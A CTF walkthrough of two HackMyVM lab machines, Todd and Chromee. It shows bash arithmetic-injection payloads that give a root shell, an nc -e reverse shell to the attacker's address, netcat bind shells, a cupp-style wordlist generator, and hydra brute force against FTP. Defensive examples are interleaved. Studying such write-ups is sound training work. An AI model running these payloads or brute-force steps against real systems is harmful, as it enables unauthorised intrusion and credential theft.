2025/03/23 04:06:59 CMD: UID=0 PID=31140 | sudo -u todd nc -e /opt/fake_ssh -lp 23849
2025/03/23 04:06:59 CMD: UID=0 PID=31138 | /bin/bash /opt/create_nc.sh
2025/03/23 04:06:59 CMD: UID=1000 PID=31137 | nc -e /opt/fake_ssh -lp 7616
2025/03/23 04:06:59 CMD: UID=1000 PID=31136 | bash
2025/03/23 04:06:59 CMD: UID=0 PID=31135 | sudo -u todd nc -e /opt/fake_ssh -lp 7616
2025/03/23 04:06:59 CMD: UID=0 PID=31133 | /bin/bash /opt/create_nc.sh
2025/03/23 04:06:59 CMD: UID=0 PID=31131 | sudo -u todd nc -e /bin/bash -lp 7066
2025/03/23 04:06:59 CMD: UID=0 PID=31130 | /bin/bash /opt/create_nc2.sh
2025/03/23 04:06:59 CMD: UID=0 PID=30903 |
2025/03/23 04:06:59 CMD: UID=0 PID=30732 |
2025/03/23 04:06:59 CMD: UID=0 PID=30618 |
2025/03/23 04:06:59 CMD: UID=0 PID=29970 |
2025/03/23 04:06:59 CMD: UID=0 PID=4751 |
2025/03/23 04:06:59 CMD: UID=0 PID=4583 |
2025/03/23 04:06:59 CMD: UID=33 PID=489 | /usr/sbin/apache2 -k start
2025/03/23 04:06:59 CMD: UID=33 PID=488 | /usr/sbin/apache2 -k start
2025/03/23 04:06:59 CMD: UID=0 PID=394 | /usr/sbin/apache2 -k start
2025/03/23 04:06:59 CMD: UID=0 PID=364 | /usr/sbin/sshd -D
2025/03/23 04:06:59 CMD: UID=0 PID=348 | /sbin/dhclient -4 -v -i -pf /run/dhclient.enp0s3.pid -lf /var/lib/dhcp/dhclient.enp0s3.leases -I -df /var/lib/dhcp/dhclient6.enp0s3.leases enp0s3
2025/03/23 04:06:59 CMD: UID=0 PID=338 | /sbin/agetty -o -p -- \u --noclear tty1 linux
2025/03/23 04:06:59 CMD: UID=104 PID=312 | /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
2025/03/23 04:06:59 CMD: UID=0 PID=311 | /usr/sbin/rsyslogd -n -iNONE
2025/03/23 04:06:59 CMD: UID=0 PID=310 | /lib/systemd/systemd-logind
2025/03/23 04:06:59 CMD: UID=0 PID=309 | /usr/sbin/cron -f
2025/03/23 04:06:59 CMD: UID=0 PID=301 |
2025/03/23 04:06:59 CMD: UID=0 PID=298 |
2025/03/23 04:06:59 CMD: UID=101 PID=258 | /lib/systemd/systemd-timesyncd
2025/03/23 04:06:59 CMD: UID=0 PID=239 | /lib/systemd/systemd-udevd
2025/03/23 04:06:59 CMD: UID=0 PID=217 | /lib/systemd/systemd-journald
2025/03/23 04:06:59 CMD: UID=0 PID=1 | /sbin/init
2025/03/23 04:07:00 CMD: UID=0 PID=31229 | (bash)
2025/03/23 04:07:01 CMD: UID=0 PID=31230 | /sbin/init
2025/03/23 04:07:03 CMD: UID=0 PID=31231 | (bash)
2025/03/23 04:07:04 CMD: UID=0 PID=31232 | /sbin/init
2025/03/23 04:07:05 CMD: UID=0 PID=31233 | /sbin/init
2025/03/23 04:07:06 CMD: UID=0 PID=31234 | /sbin/init
2025/03/23 04:07:08 CMD: UID=0 PID=31235 | /sbin/init
2025/03/23 04:07:09 CMD: UID=0 PID=31236 | (bash)
2025/03/23 04:07:10 CMD: UID=0 PID=31237 | (bash)
2025/03/23 04:07:11 CMD: UID=0 PID=31238 | /sbin/init
2025/03/23 04:07:13 CMD: UID=0 PID=31239 | /sbin/init
2025/03/23 04:07:15 CMD: UID=0 PID=31241 | /sbin/init
2025/03/23 04:07:16 CMD: UID=0 PID=31242 | /sbin/init
2025/03/23 04:07:18 CMD: UID=0 PID=31243 | /sbin/init
2025/03/23 04:07:19 CMD: UID=0 PID=31244 | /sbin/init
2025/03/23 04:07:20 CMD: UID=0 PID=31245 | (bash)
2025/03/23 04:07:21 CMD: UID=0 PID=31246 | /sbin/init
2025/03/23 04:07:23 CMD: UID=0 PID=31247 | /sbin/init
2025/03/23 04:07:24 CMD: UID=0 PID=31248 | /sbin/init
2025/03/23 04:07:25 CMD: UID=0 PID=31249 | /sbin/init
2025/03/23 04:07:26 CMD: UID=0 PID=31250 | (bash)
2025/03/23 04:07:28 CMD: UID=0 PID=31251 | /sbin/init
2025/03/23 04:07:29 CMD: UID=0 PID=31252 | /sbin/init
2025/03/23 04:07:30 CMD: UID=0 PID=31253 | /sbin/init
2025/03/23 04:07:31 CMD: UID=0 PID=31254 | /sbin/init
2025/03/23 04:07:33 CMD: UID=0 PID=31255 | /sbin/init
2025/03/23 04:07:34 CMD: UID=0 PID=31256 | /sbin/init
2025/03/23 04:07:35 CMD: UID=0 PID=31257 | /sbin/init
2025/03/23 04:07:36 CMD: UID=0 PID=31258 | /sbin/init
2025/03/23 04:07:38 CMD: UID=0 PID=31259 | (bash)
2025/03/23 04:07:39 CMD: UID=0 PID=31260 | /sbin/init
2025/03/23 04:07:40 CMD: UID=0 PID=31261 | /sbin/init
2025/03/23 04:07:40 CMD: UID=0 PID=31262 |
2025/03/23 04:07:41 CMD: UID=0 PID=31263 | /sbin/init
2025/03/23 04:07:43 CMD: UID=0 PID=31264 | /sbin/init
2025/03/23 04:07:44 CMD: UID=0 PID=31265 | /sbin/init
2025/03/23 04:07:45 CMD: UID=0 PID=31266 | /sbin/init
2025/03/23 04:07:46 CMD: UID=0 PID=31267 | /sbin/init
2025/03/23 04:07:48 CMD: UID=0 PID=31268 | /sbin/init
2025/03/23 04:07:49 CMD: UID=0 PID=31269 | /sbin/init
2025/03/23 04:07:50 CMD: UID=0 PID=31270 | /sbin/init
2025/03/23 04:07:51 CMD: UID=0 PID=31271 | /sbin/init
2025/03/23 04:07:53 CMD: UID=0 PID=31272 | (bash)
2025/03/23 04:07:54 CMD: UID=0 PID=31273 | /sbin/init
2025/03/23 04:07:55 CMD: UID=0 PID=31274 | /sbin/init
2025/03/23 04:07:56 CMD: UID=0 PID=31275 | /sbin/init
2025/03/23 04:07:58 CMD: UID=0 PID=31276 | /sbin/init
2025/03/23 04:07:59 CMD: UID=0 PID=31277 | /sbin/init
2025/03/23 04:08:00 CMD: UID=0 PID=31278 | /sbin/init
2025/03/23 04:08:01 CMD: UID=0 PID=31279 | /sbin/init
2025/03/23 04:08:01 CMD: UID=0 PID=31282 | /usr/sbin/CRON -f
2025/03/23 04:08:01 CMD: UID=0 PID=31281 | /usr/sbin/cron -f
2025/03/23 04:08:01 CMD: UID=0 PID=31280 | /usr/sbin/cron -f
2025/03/23 04:08:01 CMD: UID=0 PID=31284 | /usr/sbin/CRON -f
2025/03/23 04:08:02 CMD: UID=0 PID=31283 | /usr/sbin/CRON -f
2025/03/23 04:08:02 CMD: UID=0 PID=31287 | /bin/sh -c /bin/bash /opt/kill_todd.sh
2025/03/23 04:08:02 CMD: UID=0 PID=31286 | /bin/bash /opt/create_nc2.sh
2025/03/23 04:08:02 CMD: UID=0 PID=31285 | /usr/sbin/CRON -f
2025/03/23 04:08:02 CMD: UID=0 PID=31290 | /bin/bash /opt/kill_todd.sh
2025/03/23 04:08:02 CMD: UID=0 PID=31289 | /bin/bash /opt/create_nc2.sh
2025/03/23 04:08:02 CMD: UID=0 PID=31288 | /bin/bash /opt/create_nc.sh
2025/03/23 04:08:02 CMD: UID=0 PID=31291 | /bin/bash /opt/create_nc.sh
2025/03/23 04:08:02 CMD: UID=0 PID=31292 | /bin/bash /opt/create_nc2.sh
2025/03/23 04:08:02 CMD: UID=0 PID=31293 | /bin/bash /opt/create_nc.sh
There is a kill_todd.sh; so that is why the nc connection kept dropping. We need a way to delete it, so first check what permissions we have.
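As an added example (not part of this write-up or the Todd box), the following POSIX shell filter pulls the nc -e listeners out of pspy output like the above, which is how a defender would spot a cron script handing a port to a bind shell; the sample lines are constructed here in pspy's format.

```shell
#!/bin/sh
# Added example, not from the write-up or the Todd box: flag netcat processes
# in pspy output that bind a port (-l/-lp) and attach a program with -e.

# Constructed sample lines in pspy's "CMD:" format (values made up here).
SAMPLE_PSPY='2025/03/23 04:06:59 CMD: UID=0 PID=31227 | /sbin/init
2025/03/23 04:06:59 CMD: UID=1000 PID=31173 | nc -e /opt/fake_ssh -lp 32342
2025/03/23 04:06:59 CMD: UID=0 PID=31172 | sudo -u todd nc -e /opt/fake_ssh -lp 32342
2025/03/23 04:06:59 CMD: UID=0 PID=31131 | sudo -u todd nc -e /bin/bash -lp 7066
2025/03/23 04:06:59 CMD: UID=0 PID=31130 | /bin/bash /opt/create_nc2.sh
2025/03/23 04:06:59 CMD: UID=33 PID=489 | /usr/sbin/apache2 -k start'

# Read pspy lines on stdin; print "PID UID PORT PROGRAM" for each nc listener.
flag_nc_listeners() {
    awk '
    /CMD:/ {
        cmd = $0; sub(/^.*\| /, "", cmd)            # command line after "| "
        # only nc invocations that both listen and hand the socket to a program
        if (cmd !~ /(^|[ \/])nc / || cmd !~ / -e / || cmd !~ / -l/) next
        uid = $0; sub(/^.*UID=/, "", uid); sub(/ .*$/, "", uid)
        pid = $0; sub(/^.*PID=/, "", pid); sub(/ .*$/, "", pid)
        prog = "?"
        if (match(cmd, /-e +[^ ]+/)) {
            prog = substr(cmd, RSTART, RLENGTH); sub(/^-e +/, "", prog)
        }
        port = "?"
        if (match(cmd, /(-lp|-p|-l) +[0-9]+/)) {
            port = substr(cmd, RSTART, RLENGTH); sub(/^.* /, "", port)
        }
        print pid, uid, port, prog
    }'
}

# Count how many of the flagged listeners were started by root (UID 0),
# i.e. the sudo -u wrapper spawned from the cron job.
count_root_spawned() {
    flag_nc_listeners | awk '$2 == 0 { n++ } END { print n + 0 }'
}

printf '%s\n' "$SAMPLE_PSPY" | flag_nc_listeners
```

Pipe a saved pspy log into flag_nc_listeners to get one line per listener; a non-zero count_root_spawned means a privileged process is handing ports to unprivileged shells.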
sudo -l
Matching Defaults entries for todd on todd:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User todd may run the following commands on todd:
(ALL : ALL) NOPASSWD: /bin/bash /srv/guess_and_check.sh
(ALL : ALL) NOPASSWD: /usr/bin/rm
(ALL : ALL) NOPASSWD: /usr/sbin/reboot
We have sudo rights for rm, so just delete that script.
┌──(root㉿kali-plus)-[~]
└─# nc 192.168.56.111 7066
cd /opt
ls -al
total 40
drwxr-xr-x 2 root root 4096 Mar 22 10:40 .
drwxr-xr-x 18 root root 4096 Nov 13 2020 ..
-rwx------ 1 root root 138 Mar 22 08:00 create_nc2.sh
-rwx---r-- 1 root root 141 Mar 22 07:42 create_nc.sh
-rwx------ 1 root root 16608 Mar 22 07:21 fake_ssh
-rwx------ 1 root root 17 Mar 22 07:07 kill_todd.sh
sudo rm kill_todd.sh
sudo rm fake_ssh
bash
ls -al
total 16
drwxr-xr-x 2 root root 4096 Mar 23 04:26 .
drwxr-xr-x 18 root root 4096 Nov 13 2020 ..
-rwx------ 1 root root 138 Mar 22 08:00 create_nc2.sh
-rwx---r-- 1 root root 141 Mar 22 07:42 create_nc.sh
cat create_nc.sh
#!/bin/bash
create_ssh(){
sudo -u todd nc -e /opt/fake_ssh -lp $1
}
for i in $(seq 10)
do
a=$((RANDOM))
sleep 0.2
create_ssh $a &
done
create_nc.sh is what spawns fake_ssh, so it can be deleted too. Next, copy our local SSH key onto the target and see whether we can log in.
┌──(root㉿kali-plus)-[~/.ssh]
└─# ssh todd@192.168.56.111
The authenticity of host '192.168.56.111 (192.168.56.111)' can't be established.
ED25519 key fingerprint is SHA256:rXcjV9xeZG+J6KZLTr1t2Xi2ErBvMauXjxH4EBvhV0c.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.111' (ED25519) to the list of known hosts.
Linux todd 4.19.0-12-amd64 #1 SMP Debian 4.19.152-1 (2020-10-18) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
$ bash
todd@todd:~$
Logged in successfully.
Privilege escalation - root flag
todd@todd:~$ sudo -l
Matching Defaults entries for todd on todd:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User todd may run the following commands on todd:
(ALL : ALL) NOPASSWD: /bin/bash /srv/guess_and_check.sh
(ALL : ALL) NOPASSWD: /usr/bin/rm
(ALL : ALL) NOPASSWD: /usr/sbin/reboot
todd@todd:~$ cd /srv
todd@todd:/srv$ ls
guess_and_check.sh note.jpg
todd@todd:/srv$ cat note.jpg
u can try bash -x guess_and_check.sh
This gives a hint. Below is guess_and_check.sh:
#!/bin/bash
cat << EOF
. **
* *.
,*
*,
, ,*
., *,
/ *
,* *,
/. .*.
* **
,* ,*
** *.
** **.
,* **
*, ,*
* **
*, .*
*. **
** ,*,
** *, HackMyVM
EOF
# check this script used by human
a=$((RANDOM%1000))
echo "Please Input [$a]"
echo "[+] Check this script used by human."
echo "[+] Please Input Correct Number:"
read -p ">>>" input_number
[[ $input_number -ne "$a" ]] && exit 1
sleep 0.2
true_file="/tmp/$((RANDOM%1000))"
sleep 1
false_file="/tmp/$((RANDOM%1000))"
[[ -f "$true_file" ]] && [[ ! -f "$false_file" ]] && cat /root/.cred || exit 2
The key line is [[ $input_number -ne "$a" ]] && exit 1. It compares our input with the variable a as numbers. If we type a, bash treats our input as the variable a, so the comparison becomes a against a, which is always equal, and the check is bypassed. Because the input is evaluated as an arithmetic expression, this is an injection point: bash supports arrays, an array subscript is itself an arithmetic expression that gets evaluated, so code can be injected in the subscript position.
todd@todd:/srv$ sudo /bin/bash /srv/guess_and_check.sh
Please Input [365]
[+] Check this script used by human.
[+] Please Input Correct Number:
>>>a[$(id)]
/srv/guess_and_check.sh: line 35: uid=0(root) gid=0(root) groups=0(root): syntax error in expression (error token is "(root) gid=0(root) groups=0(root)")
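To make the failure mode concrete, here is an added example (not the box's guess_and_check.sh) with the same check in its vulnerable form next to a hardened form that accepts only a short run of digits; the function names and the test value 365 are chosen for this illustration.

```shell
#!/bin/bash
# Added example, not the box's guess_and_check.sh: the number check in its
# vulnerable form beside a hardened form, runnable offline.

# Vulnerable (same construct as on the box): the operands of -ne inside [[ ]]
# are arithmetic expressions. Input "a" is read as the variable a (so it always
# equals $a), "a[$(cmd)]" is an array subscript whose command substitution is
# executed during evaluation, and even a syntax error such as "*" only makes
# [[ ]] fail, so the "&& exit 1" is skipped and the check passes anyway.
vulnerable_check() {
    local a="$1" input="$2"
    [[ $input -ne "$a" ]] && return 1
    return 0
}

# Hardened: accept only 1-3 decimal digits, then compare with [ ] after forcing
# base 10 (10#), so the input is never evaluated as an expression. Anything
# else, including a bare variable name or an array subscript, is rejected.
hardened_check() {
    local a="$1" input="$2"
    local digits='^[0-9]{1,3}$'
    [[ $input =~ $digits ]] || return 1
    [ "$((10#$input))" -eq "$a" ]
}

# Demo with the value the script would have printed as "Please Input [365]".
a=365
for candidate in 365 366 a; do
    vulnerable_check "$a" "$candidate" && v=pass || v=reject
    hardened_check "$a" "$candidate" && h=pass || h=reject
    printf '%-6s vulnerable=%-6s hardened=%s\n' "$candidate" "$v" "$h"
done
```

Pair the hardened check with read -r so backslashes in the input are not interpreted either.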
From here, several approaches are possible.
Method 1: get a root shell directly
todd@todd:/srv$ sudo /bin/bash /srv/guess_and_check.sh
Please Input [887]
[+] Check this script used by human.
[+] Please Input Correct Number:
>>>a[`bash >&2`]
root@todd:/srv# id
uid=0(root) gid=0(root) groups=0(root)
Method 2: reverse shell
todd@todd:/srv$ sudo /bin/bash /srv/guess_and_check.sh
Please Input [720]
[+] Check this script used by human.
[+] Please Input Correct Number:
>>>a[`nc -e /bin/bash 192.168.56.101 1234`]
┌──(root㉿kali-plus)-[~]
└─# nc -lvvp 1234
nc: getnameinfo: Temporary failure in name resolution
nc: getnameinfo: Temporary failure in name resolution
id
uid=0(root) gid=0(root) groups=0(root)
Method 3: obtain root's password
Let's analyze the last part of the script:
sleep 0.2
true_file="/tmp/$((RANDOM%1000))"
sleep 1
false_file="/tmp/$((RANDOM%1000))"
[[ -f "$true_file" ]] && [[ ! -f "$false_file" ]] && cat /root/.cred || exit 2
There is a true_file and a false_file, each named after a random number below 1000. If the randomly chosen true_file exists and the false_file does not, the script prints /root/.cred. So if we create 500 files in that directory, each run has roughly a 1/4 chance of printing /root/.cred.
todd@todd:/tmp$ sudo /bin/bash /srv/guess_and_check.sh
Please Input [781]
[+] Check this script used by human.
[+] Please Input Correct Number:
>>>781
fake password
Entered by hand like this, there is a 1/4 chance of getting the password each time; yes, fake password really is the password. But typing it by hand is slow, so we can use for i in $(seq 5);do echo '*' | sudo /bin/bash /srv/guess_and_check.sh ;done
todd@todd:/tmp$ for i in $(seq 5);do echo '*' | sudo /bin/bash /srv/guess_and_check.sh ;done
Please Input [662]
[+] Check this script used by human.
[+] Please Input Correct Number:
/srv/guess_and_check.sh: line 35: [[: *: syntax error: operand expected (error token is "*")
fake password
Please Input [829]
[+] Check this script used by human.
[+] Please Input Correct Number:
/srv/guess_and_check.sh: line 35: [[: *: syntax error: operand expected (error token is "*")
Please Input [180]
[+] Check this script used by human.
[+] Please Input Correct Number:
/srv/guess_and_check.sh: line 35: [[: *: syntax error: operand expected (error token is "*")
Please Input [572]
[+] Check this script used by human.
[+] Please Input Correct Number:
/srv/guess_and_check.sh: line 35: [[: *: syntax error: operand expected (error token is "*")
Please Input [908]
[+] Check this script used by human.
[+] Please Input Correct Number:
/srv/guess_and_check.sh: line 35: [[: *: syntax error: operand expected (error token is "*")
We can also use for i in $(seq 5);do echo 'a' | sudo /bin/bash /srv/guess_and_check.sh ;done
Or for i in $(seq 5);do echo 'a' | sudo /bin/bash /srv/guess_and_check.sh|grep 'Correct Number' -A 1;done
todd@todd:/tmp$ for i in $(seq 5);do echo 'a' | sudo /bin/bash /srv/guess_and_check.sh|grep 'Correct Number' -A 1;done
[+] Please Input Correct Number:
[+] Please Input Correct Number:
fake password
[+] Please Input Correct Number:
[+] Please Input Correct Number:
[+] Please Input Correct Number:
fake password
todd@todd:/tmp$ su - root
Password:
root@todd:~# id
uid=0(root) gid=0(root) groups=0(root)
root@todd:~# ls
root.txt
root@todd:~# cat root.txt
Todd{389c9909b8d6a701217a45104de7aa21}
Chromee
Information gathering
The IP address is 192.168.56.112; next, gather information on its ports.
┌──(root㉿kali-plus)-[~]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:1d:89:b5, IPv4: 192.168.56.101
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1 0a:00:27:00:00:17 (Unknown: locally administered)
192.168.56.100 08:00:27:99:57:5b PCS Systemtechnik GmbH
192.168.56.112 08:00:27:a5:6f:25 PCS Systemtechnik GmbH
3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.043 seconds (125.31 hosts/sec). 3 responded
┌──(root㉿kali-plus)-[~]
└─# nmap 192.168.56.112 -p-
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-28 19:46 CST
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.56.112
Host is up (0.0034s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
8080/tcp open http-proxy
23333/tcp open elxmgmt
MAC Address: 08:00:27:A5:6F:25 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 13.84 seconds
┌──(root㉿kali-plus)-[~]
└─# nmap -sV -sT 192.168.56.112 -p 8080,23333
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-28 19:47 CST
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.56.112
Host is up (0.0011s latency).
PORT STATE SERVICE VERSION
8080/tcp open http Apache httpd 2.4.56 ((Debian))
23333/tcp open ftp vsftpd 3.0.3
MAC Address: 08:00:27:A5:6F:25 (Oracle VirtualBox virtual NIC)
Service Info: OS: Unix
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.54 seconds
Ports 22, 80, 8080 and 23333 are open; let's look at 80 and 8080 first.
┌──(root㉿kali-plus)-[~]
└─# curl http://192.168.56.112:80
<!DOCTYPE html>
<html lang="zh-CN">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>primary</title>
<style>
/* 基础重置与字体 */
* {
margin: 0;
padding: 0;
box-sizing: border-box;
font-family: 'Segoe UI', system-ui, sans-serif;
}
/* 渐变背景与整体布局 */
body {
background: linear-gradient(135deg, #f5f7fa 0%, #c3cfe2 100%);
line-height: 1.6;
color: #333;
}
/* 导航栏样式 */
.navbar {
background: rgba(255, 255, 255, 0.95);
padding: 1rem 2rem;
box-shadow: 0 2px 10px rgba(0, 0, 0, 0.1);
position: fixed;
width: 100%;
top: 0;
z-index: 1000;
}
.nav-links {
display: flex;
justify-content: space-between;
align-items: center;
max-width: 1200px;
margin: 0 auto;
}
.logo {
font-size: 1.8rem;
font-weight: 700;
color: #2c3e50;
text-decoration: none;
transition: color 0.3s ease;
}
.logo:hover {
color: #3498db;
}
/* Main content container */
.container {
max-width: 1200px;
margin: 100px auto 40px;
padding: 0 20px;
}
/* Hero section */
.hero {
text-align: center;
padding: 6rem 0;
background: linear-gradient(45deg, #6a11cb 0%, #2575fc 100%);
color: white;
border-radius: 15px;
margin-bottom: 3rem;
box-shadow: 0 10px 20px rgba(0, 0, 0, 0.2);
}
.hero h1 {
font-size: 3.5rem;
margin-bottom: 1.5rem;
text-shadow: 2px 2px 4px rgba(0, 0, 0, 0.3);
}
/* Card layout */
.card-container {
display: grid;
grid-template-columns: repeat(auto-fit, minmax(300px, 1fr));
gap: 2rem;
padding: 2rem 0;
}
.card {
background: white;
padding: 2rem;
border-radius: 12px;
transition: transform 0.3s ease;
box-shadow: 0 5px 15px rgba(0, 0, 0, 0.1);
}
.card:hover {
transform: translateY(-10px);
}
.card h3 {
color: #2c3e50;
margin-bottom: 1rem;
font-size: 1.5rem;
}
/* Button styles */
.btn {
display: inline-block;
padding: 1rem 2rem;
background: #3498db;
color: white;
text-decoration: none;
border-radius: 25px;
transition: all 0.3s ease;
margin-top: 1rem;
}
.btn:hover {
background: #2980b9;
transform: translateY(-2px);
box-shadow: 0 5px 15px rgba(52, 152, 219, 0.4);
}
/* Responsive design */
@media (max-width: 768px) {
.hero h1 {
font-size: 2.5rem;
}
.card-container {
grid-template-columns: 1fr;
}
}
</style>
</head>
<body>
<nav class="navbar">
<div class="nav-links">
<a href="#" class="logo">ModernUI</a>
<div>
<a href="#" class="btn">Try it now</a>
</div>
</div>
</nav>
<div class="container">
<section class="hero">
<h1>Create extraordinary experiences</h1>
<p>Building outstanding digital products through innovative design</p>
<a href="#" class="btn" style="margin-top: 2rem;">Learn more</a>
</section>
<div class="card-container">
<article class="card">
<h3>Responsive design</h3>
<p>Adapts to every screen size for a consistent user experience</p>
</article>
<article class="card">
<h3>Modern interaction</h3>
<p>Smooth animations and intuitive controls that boost engagement</p>
</article>
<article class="card">
<h3>High performance</h3>
<p>Optimised code structure for fast loading and smooth operation</p>
</article>
</div>
</div>
</body>
</html>
┌──(root㉿kali-plus)-[~]
└─# curl http://192.168.56.112:8080
<h2>You may need to bypass!</h2>
Next, run gobuster against both web ports. Port 80 turns up /post.php and /secret.php; requesting /secret.php on port 80 sends back the PHP source itself (549 bytes) rather than rendered output, so PHP is not executed for that path on the default host. Port 8080 gives only /javascript, /silence (403) and /server-status (403).
┌──(root㉿kali-plus)-[~]
└─# gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://192.168.56.112/ -x.txt,.php,.zip
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.112/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: txt,php,zip
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/post.php (Status: 200) [Size: 3]
/secret.php (Status: 200) [Size: 549]
Progress: 558124 / 882240 (63.26%)^C
[!] Keyboard interrupt detected, terminating.
Progress: 558313 / 882240 (63.28%)
===============================================================
Finished
===============================================================
┌──(root㉿kali-plus)-[~]
└─# gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://192.168.56.112:8080/ -x.txt,.php,.zip
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.112:8080/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: php,zip,txt
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/javascript (Status: 301) [Size: 328] [--> http://192.168.56.112:8080/javascript/]
/silence (Status: 403) [Size: 281]
/server-status (Status: 403) [Size: 281]
Progress: 882236 / 882240 (100.00%)
===============================================================
Finished
===============================================================
The /secret.php source as downloaded from port 80:
<!DOCTYPE html>
<html>
<head>
<title>Secret</title>
</head>
<body>
<?php
$greeting = date('H') < 12 ? 'Good morning' : (date('H') < 18 ? 'Good afternoon' : 'Good evening');
$visitorIP = htmlspecialchars($_SERVER['REMOTE_ADDR']);
echo "<h1>{$greeting}, adriana</h1>";
echo "<p>Current time: " . date('Y-m-d H:i:s') . "</p>";
echo "<p>Your IP: {$visitorIP}</p>";
if (isset($_GET['aaa'])) {
$file_content = file_get_contents('/opt/note/dic.txt');
echo $file_content;
} else {
die();
}
?>
</body>
</html>
user flag
Requesting /silence on port 8080 returns 403 (the gobuster hit). Requested a different way it becomes a 301, and appending /index.html yields a page with a contact address. The useful part is the domain chromee.hmv: add it to /etc/hosts (192.168.56.112 chromee.hmv) and request http://chromee.hmv/secret.php, so that the request reaches the virtual host for that name rather than the default server.
Silence
We are working to improve our website.
contact: support@chromee.hmv
Through the virtual host, secret.php is executed rather than served as source. The source above shows the trigger: any request carrying a query parameter named aaa (its value is irrelevant) makes the script print /opt/note/dic.txt:
Good afternoon, adriana
Current time: 2025-03-28 13:57:34
Your IP: 192.168.56.101
The Lost Key Lily, a curious girl, found an old rusty key in the woods. Wondering where it belonged, she asked everyone in the village, but no one knew. One day, she discovered a locked stone well. To her surprise, the key fit. She opened it and descended into a hidden passage. There, she found an ancient chest filled with treasures. But the real treasure was a note inside: “The greatest treasure is the journey, not the prize.” Lily smiled, realizing the adventure was the real reward.
Two names appear here, adriana and Lily. Generate a wordlist for each with cupp, concatenate them into one file (chromee.txt) and run it against the FTP service on port 23333 with hydra:
┌──(root㉿kali-plus)-[~]
└─# hydra -l adriana -P chromee.txt ftp://192.168.56.112:23333 -t 10
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-03-28 21:26:33
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 10 tasks per 1 server, overall 10 tasks, 163 login tries (l:1/p:163), ~17 tries per task
[DATA] attacking ftp://192.168.56.112:23333/
[23333][ftp] host: 192.168.56.112 login: adriana password: Lily2020
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-03-28 21:26:46
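What a cupp-style list for these two names looks like, as an added Python example (this is not code from the writeup and not cupp itself): the names come from secret.php and dic.txt, while the year range, suffixes and mutation rules are my own assumptions about what such a list should contain. It writes chromee.txt in the same one-word-per-line shape hydra consumed above.

```python
# Added example: build a small targeted wordlist from names found on the
# target, the way cupp does. Names are from the page; YEARS, SUFFIXES and
# the leet mapping are assumptions.
from itertools import product

NAMES = ["adriana", "lily"]              # from secret.php and dic.txt
YEARS = range(2015, 2026)                # assumption: recent years only
SUFFIXES = ["!", "123", "@", "#", "2020!"]
LEET = str.maketrans("aeios", "43105")   # a->4 e->3 i->1 o->0 s->5


def case_variants(name):
    """lower, Capitalised, UPPER and a simple leet form of one name."""
    base = name.lower()
    return {base, base.capitalize(), base.upper(), base.translate(LEET)}


def targeted_wordlist(names=NAMES, years=YEARS, suffixes=SUFFIXES):
    """Return a sorted, de-duplicated list of candidate passwords."""
    words = set()
    for name in names:
        for variant in case_variants(name):
            words.add(variant)
            for year in years:
                words.add(f"{variant}{year}")            # Lily2020
                words.add(f"{variant}{year % 100:02d}")  # Lily20
            for suffix in suffixes:
                words.add(f"{variant}{suffix}")
    # name+name combinations, e.g. adrianaLily
    for first, second in product(names, repeat=2):
        if first != second:
            words.add(first.lower() + second.capitalize())
    return sorted(words)


def write_wordlist(path, words):
    """One candidate per line, the format hydra -P expects."""
    with open(path, "w") as fh:
        fh.write("\n".join(words) + "\n")


if __name__ == "__main__":
    candidates = targeted_wordlist()
    write_wordlist("chromee.txt", candidates)
    print(len(candidates), "candidates written to chromee.txt")
```

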